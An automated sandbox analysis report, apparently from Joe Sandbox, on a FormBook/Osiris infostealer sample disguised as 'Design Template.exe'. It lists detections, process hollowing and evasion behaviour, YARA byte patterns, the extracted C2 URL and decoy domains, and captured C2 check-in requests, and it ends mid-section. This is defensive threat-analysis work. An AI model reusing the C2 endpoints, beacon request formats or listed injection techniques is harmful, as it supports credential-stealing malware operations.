Loading ...

Play interactive tourEdit tour

Analysis Report Design Template.exe

Overview

General Information

Sample Name:Design Template.exe
Analysis ID:385453
MD5:56d56566623a2bc942141b56f9dd3da5
SHA1:bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256:5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Osiris FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Osiris Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Design Template.exe (PID: 3260 cmdline: 'C:\Users\user\Desktop\Design Template.exe' MD5: 56D56566623A2BC942141B56F9DD3DA5)
    • Design Template.exe (PID: 6300 cmdline: C:\Users\user\Desktop\Design Template.exe MD5: 56D56566623A2BC942141B56F9DD3DA5)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 7036 cmdline: /c del 'C:\Users\user\Desktop\Design Template.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Liebert.bmpJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\Liebert.bmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\Liebert.bmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 13 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: Design Template.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
        Found malware configurationShow sources
        Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: Design Template.exeVirustotal: Detection: 34%Perma Link
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\Liebert.bmpJoe Sandbox ML: detected
        Machine Learning detection for sampleShow sources
        Source: Design Template.exeJoe Sandbox ML: detected
        Source: 14.2.rundll32.exe.7b4cd8.1.unpackAvira: Label: TR/Patched.Gen
        Source: 14.2.rundll32.exe.4997960.5.unpackAvira: Label: TR/Patched.Gen
        Source: Design Template.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
        Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.zq2003.com/ma3c/
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
        Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/OnlyDomains" target="_blank" rel="nofollow" title="OnlyDomains Facebook"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: unknownDNS traffic detected: queries for: www.modomo.amsterdam
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 12:42:39 GMTServer: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9aContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
        Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:wght
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/onlydomains
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com
        Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpString found in binary or memory: https://www.trustpilot.com/review/onlydomains.com
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042CCDA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
        Source: C:\Users\user\Desktop\Design Template.exeCode function: 2_2_0042E537 GetKeyState,GetKeyState,GetKeyState,GetKeyState,

        E-Banking Fraud:

        barindex
        Detected Osiris TrojanShow sources
        Source: C:\Users\user\Desktop\Design Template.exeFile created: C:\Users\user\AppData\Local\Temp\Liebert.bmpJump to dropped file
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
